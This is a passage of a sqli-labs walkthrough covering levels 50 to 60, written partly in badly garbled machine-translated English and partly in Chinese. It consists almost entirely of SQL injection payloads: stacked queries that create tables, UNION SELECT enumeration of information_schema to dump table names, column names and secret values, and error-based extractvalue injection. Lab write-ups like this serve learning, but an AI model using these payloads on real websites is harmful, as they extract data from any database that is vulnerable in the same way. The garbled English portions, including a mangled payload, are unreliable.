11-20 below start off, not before the checkpoint I can refer to these articles: 1-10 off sql-lib checkpoints Cheats , 11-20 off sql-lib checkpoints Cheats , sql-lib break through the barrier of 21 Cheats 30 off , SQL pass through the off-lib 31-40 Cheats, SQL-off 41-50 lib checkpoints Cheats
Whether a few off, our ultimate goal is to get the user's password in order to gain the highest authority!
The following learning process if they are not there or do not know where you are welcome to leave a message, I will try to help you ~
The fifty-Off
This off and thirty-eight off essentially the same, the problem is simply injected into stacked character ?sort=1';create table test51 like users;%23
Look database found friends
Fifty-off
And fifty-off, in that it does not display an error
sort = 1;? Create table test52 like users;% 23
Stack injection
Fifty-third off
And fifty-one off the same, the difference is not an error
?sort=1';create table test53 like users;%23
Fifty-fourth off
Nothing particularly special this off of the number of queries that can only enter 10 injections information, recording a cookie.
Charles Library ?id=-1%27%20union%20select%201,database(),%273
查表 ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
Explosive column? Id = -1 'union select 1, group_concat (column_name), 3 from information_schema.columns where table_name =' i58u96bgqr (Off latter name is found in our earlier)
爆数据 ?id=-1' union select 1,group_concat(secret_6KHN),3 from i58u96bgqr%23(爆咱刚才查到的一张表的数据)
将我们刚才获得的输入得到这个
第五十五关
和上一关一样,加了一个小括号 通过测试发现是加了小括号,一共可以输入14次
查表 ?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23(和上一关一样就是把引号改成括号了,是吧)
第五十六关
和之前一样,通过测试发现是单引号括号闭合,其他的操作一样,我就不截图了
看数据库名 ?id=-1') union select 1,database(),3%23
第五十七关
经过测试,发现是双引号闭合,其他和前几关一样
查询数据库名 ?id=-1" union select 1,database(),3%23(基本一样不再截图)
第五十八关
我发现这机关的颜色搭配挺好看哈,这关好像只有5次机会啊。。。
后来发现没有回显,一查,这一关不能用union select语句了,那我们报错试一下
报错输入获得数据库名 ?id=0' and extractvalue(1, concat(0x5c, (select database())))%23
那就说明报错说明可以的,报错注入在之前的文章有介绍,不在这里在做解释
第五十九关
和上一关一样只不过没有单引号
报错输入获得数据库名 ?id=0 and extractvalue(1, concat(0x5c, (select database())))%23
第六十关
和上一关一样,只不过多了双引号和括号?id=0”)
报错输入获得数据库名 ?id=0") and extractvalue(1, concat(0x5c, (select database())))%23
获取表名 ?id=0") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
爆列名 ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wapsbffje5'),0x7e))--+
爆数据 ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(secret_XSR5) from wapsbffje5),0x7e))--+
输入进去 RsPZ518K3ZvXCVOvrGbhuqAZ 你搞定了他
哈哈哈哈哈,结束了60关了
51-60关结束
该文章有参考了以下的网页: